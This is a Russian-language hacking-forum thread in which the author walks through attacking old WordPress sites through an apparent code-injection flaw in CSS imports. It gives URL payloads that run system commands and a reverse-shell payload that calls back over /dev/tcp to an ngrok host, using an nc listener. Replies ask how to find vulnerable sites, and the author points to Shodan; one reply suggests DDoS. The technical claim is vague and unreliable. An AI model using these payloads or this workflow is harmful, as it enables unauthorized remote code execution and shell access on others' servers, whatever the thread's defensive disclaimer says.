Загрузка...

История о том, как я полностью взламывал wordpress сайты..

Тема в разделе Веб уязвимости создана пользователем stdout 22 июл 2021. (поднята 6 авг 2024) 4502 просмотра

Загрузка...
  1. stdout
    stdout Автор темы 22 июл 2021
    ВНИМАНИЕ! ВСЁ ЧТО ПОКАЗАНО В ЭТОЙ СТАТЬЕ НЕ ДОЛЖНО БЫТЬ ИСПОЛЬЗОВАНО В НЕЗАКОННОЙ ДЕЯТЕЛЬНОСТИ. СТАТЬЯ НАПИСАНА ЛИШЬ ДЛЯ ЗАЩИТЫ ВАШИХ СЕРВИСОВ И ПОКАЗАТЕЛЬНОМУ РАЗМЫШЛЕНИЮ!

    Ав
    тор не призывает совершать какие либо противоправные действия. 272 УК РФ - наказывается сроком до 7ми лет лишения свободы.
    Сайт моего друга, про который я говорю уже исправил уязвимость по моей просьбе. Оставлю его в анонимности

    В старых(Важно, что в старых., ибо есть недалёкие люди, который репортят мои идеи на h1) по странному устроены импорты CSS файлов. Как я понял, там есть что-то подобное
    ⁡include("wp-includes/css/" . $pwd);

    Но нам это только на руку...​
    Очень интересная строчка, даже хочется кое что попробовать
    Попробую что-то вроде
    ⁡ example.com/wp-includes/css/'.print(2+2).'.css


    [IMG]
    УСПЕХ!

    И так, php код мы умеем встраивать, но что же дальше?
    А дальше - больше..​
    После изучения возможностей PHP я пришел к выводу, что там можно выполнять команды в bash
    [IMG]
    Мы всё ближе к цели - доступ в консоли. Но что делать с полученной информацией? TCP Shell - вот на что я намекаю. Но вот не задача, любой символ на подобие пробела и ковычки сломает нам весь payload.

    Составленный нами payload выглядит так
    ⁡example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=whoami

    Как понятно из кода, мы можем в параметрах a, b, c мы можем передавать код, который будет скрепляться в один

    Теперь дело для тяжялой артилерии
    Запускаем nc
    [IMG]
    запускаем ngrok с помощью которого мы опубликуем наш айпи в интернете
    [IMG]
    и подготавливаем payload
    ⁡ example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=sudo bash -i >& /dev/tcp/0.tcp.ngrok.io/14502 0>&1

    с помощью декодера переделываем всё в url encode и [IMG]
    [IMG]
    Cпасибо огромное за прочтения, это моя первая длинная статья, которую написал сам. Выражаю благодарность тэгу CODE который шакалил статью, поэтому сегодня без него..


     
    22 июл 2021 Изменено
  2. remorda
    remorda 22 июл 2021 Заблокирован(а) 515 21 июл 2019
    Нихуя не понял, но вроде годно:cool_bun:
     
  3. Кефтеме
    Кефтеме 22 июл 2021 1098 20 июл 2020
    А %27 и %20 не сработают?
     
    1. stdout Автор темы
      Кефтеме, неа, в этом и загвостка. Было сложно сделать следующий payload
    2. DisgustingMe
      Кефтеме, плагины wp не читают код ASCII, про который ты говоришь. И как написал автор, используя кодирование символов через аски encode, скрипт полезной нагрузки написать достаточно сложно и долго.
  4. CoderVir
    Любой wp сайт можно ёбнуть типо?
     
    1. stdout Автор темы
      @CoderVir, придется проверить уязвим он или нет
  5. RocketDude
    1. Посмотреть предыдущие комментарии (1)
    2. RocketDude
      stdout, старый добрый ддос решит все проблемы
    3. stdout Автор темы
      RocketDude, добро пожаловать на:bottle:
    4. RocketDude
      stdout, будто использование уязвимостей не бутылка)
  6. qdsTM
    qdsTM 27 окт 2021 10 19 июн 2021
    Есть вариант по поиску таких сайтов?
     
    1. stdout Автор темы
      qdsTM, через shodan посмотри
  7. Raskolnikov
    Raskolnikov 24 фев 2022 9 15 дек 2016
    На каких версия вп работает и есть ли публичное упоминание этой баги?
     
    24 фев 2022 Изменено
  8. Falcon_Extra
    Falcon_Extra 9 янв 2024 Заблокирован(а) 108 22 окт 2023
    кто-то уже взломал Meta и теперь у них сервера легли на 10ч
     
Top